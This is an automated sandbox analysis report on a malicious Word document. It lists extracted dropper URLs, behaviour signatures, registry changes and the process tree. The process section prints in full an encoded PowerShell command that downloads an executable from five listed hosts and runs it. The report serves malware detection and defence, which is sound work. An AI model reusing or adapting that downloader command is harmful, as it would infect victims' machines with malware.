Analysis
-
max time kernel
61s -
max time network
9s -
resource
win7v191014 -
submitted
06-02-2020 22:49
Task
task1
Sample
44522edda696ecf4d177282d77a1463aa7e32d38264a469db5f62b3caa378fff.doc
Resource
win7v191014
0 signatures
General
-
Target
44522edda696ecf4d177282d77a1463aa7e32d38264a469db5f62b3caa378fff.doc
-
Sample
200206-kwpaymjsh6
-
SHA256
44522edda696ecf4d177282d77a1463aa7e32d38264a469db5f62b3caa378fff
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://supcargo.com/Login/K/
exe.dropper
http://sunucuo.com/wp-admin/0V0e/
exe.dropper
http://sweetestshop.ca/wp/3ca5oq/
exe.dropper
http://subhedarmarketing.com/2/7gtTEM8/
exe.dropper
http://takharandshankertour.com/wp-includes/IXR/2/
Signatures
-
Process spawned unexpected child process 1 IoCs
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1972 1580 powersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 1972 powersheLL.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powersheLL.exepid process 1972 powersheLL.exe -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 280 IoCs
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{B7E4BF80-148E-48DE-94DF-76E3C992E058}\2.0\HELPDIR WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{B7E4BF80-148E-48DE-94DF-76E3C992E058}\2.0\0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{B7E4BF80-148E-48DE-94DF-76E3C992E058}\2.0\FLAGS WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B7E4BF80-148E-48DE-94DF-76E3C992E058}\2.0\FLAGS WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B7E4BF80-148E-48DE-94DF-76E3C992E058}\2.0\0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE -
Drops file in System32 directory 1 IoCs
Processes:
powersheLL.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powersheLL.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1128 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
WINWORD.EXEpid process 1128 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\44522edda696ecf4d177282d77a1463aa7e32d38264a469db5f62b3caa378fff.doc"1⤵
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABaAHUAZQBlAG8AegBnAHMAaQA9ACcAQQBiAG8AagBmAHgAegBsACcAOwAkAFMAdQB5AHgAZwBzAGQAZwBrACAAPQAgACcANgA1ADcAJwA7ACQAQQBsAGgAaQBiAGMAcABoAGgAZQBxAHYAZAA9ACcAWQB4AGwAcwByAHoAZgByAHQAeABpAHgAbgAnADsAJABDAGcAYwBjAGwAbAB5AGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFMAdQB5AHgAZwBzAGQAZwBrACsAJwAuAGUAeABlACcAOwAkAFkAagB3AGEAdAB0AHcAZgB5AD0AJwBBAHQAeABqAGYAawB3AGgAJwA7ACQAUQB4AGcAYgBqAGcAdgB5AHAAPQAuACgAJwBuACcAKwAnAGUAJwArACcAdwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBlAGIAQwBsAGkAZQBOAHQAOwAkAE8AcQByAGMAcgBxAGkAYQBsAHcAcABzAD0AJwBoAHQAdABwADoALwAvAHMAdQBwAGMAYQByAGcAbwAuAGMAbwBtAC8ATABvAGcAaQBuAC8ASwAvACoAaAB0AHQAcAA6AC8ALwBzAHUAbgB1AGMAdQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAwAFYAMABlAC8AKgBoAHQAdABwADoALwAvAHMAdwBlAGUAdABlAHMAdABzAGgAbwBwAC4AYwBhAC8AdwBwAC8AMwBjAGEANQBvAHEALwAqAGgAdAB0AHAAOgAvAC8AcwB1AGIAaABlAGQAYQByAG0AYQByAGsAZQB0AGkAbgBnAC4AYwBvAG0ALwAyAC8ANwBnAHQAVABFAE0AOAAvACoAaAB0AHQAcAA6AC8ALwB0AGEAawBoAGEAcgBhAG4AZABzAGgAYQBuAGsAZQByAHQAbwB1AHIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEkAWABSAC8AMgAvACcALgAiAHMAYABQAEwAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAWgB5AHIAeQB2AHUAbwBsAD0AJwBDAGMAYgBmAGcAeQBkAHMAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQARQBjAGgAeQBqAGkAbABuAG8AIABpAG4AIAAkAE8AcQByAGMAcgBxAGkAYQBsAHcAcABzACkAewB0AHIAeQB7ACQAUQB4AGcAYgBqAGcAdgB5AHAALgAiAGQATwBXAG4AbABPAEEAYABkAGAARgBJAEwAZQAiACgAJABFAGMAaAB5AGoAaQBsAG4AbwAsACAAJABDAGcAYwBjAGwAbAB5AGoAKQA7ACQATgBvAG8AegBsAHQAagByAHkAYQBnAGcAPQAnAEwAZgBiAHgAeQBpAHQAZgB5AHoAeQBzAHIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABDAGcAYwBjAGwAbAB5AGoAKQAuACIATABFAGAATgBHAGAAVABIACIAIAAtAGcAZQAgADIAMgA0ADcAOQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBgAFIARQBhAFQAZQAiACgAJABDAGcAYwBjAGwAbAB5AGoAKQA7ACQARQBjAHcAawBtAGoAYwB6AGsAPQAnAFQAdQBlAHcAdgB4AGYAdgAnADsAYgByAGUAYQBrADsAJABWAGcAdQB4AGgAcQBvAGIAPQAnAEcAbABxAHcAZABrAHMAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABDAG4AeABkAGEAbAB0AGQAPQAnAE0AaABuAGYAagB3AGIAbQBlAHQAbgB4ACcA1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1128-0-0x0000000006240000-0x0000000006244000-memory.dmpFilesize
16KB
-
memory/1128-1-0x0000000006421000-0x0000000006425000-memory.dmpFilesize
16KB
-
memory/1128-2-0x0000000008DF0000-0x0000000008DF4000-memory.dmpFilesize
16KB
-
memory/1128-3-0x0000000006421000-0x0000000006425000-memory.dmpFilesize
16KB
-
memory/1128-7-0x0000000002300000-0x0000000002304000-memory.dmpFilesize
16KB
-
memory/1128-8-0x0000000002380000-0x0000000002384000-memory.dmpFilesize
16KB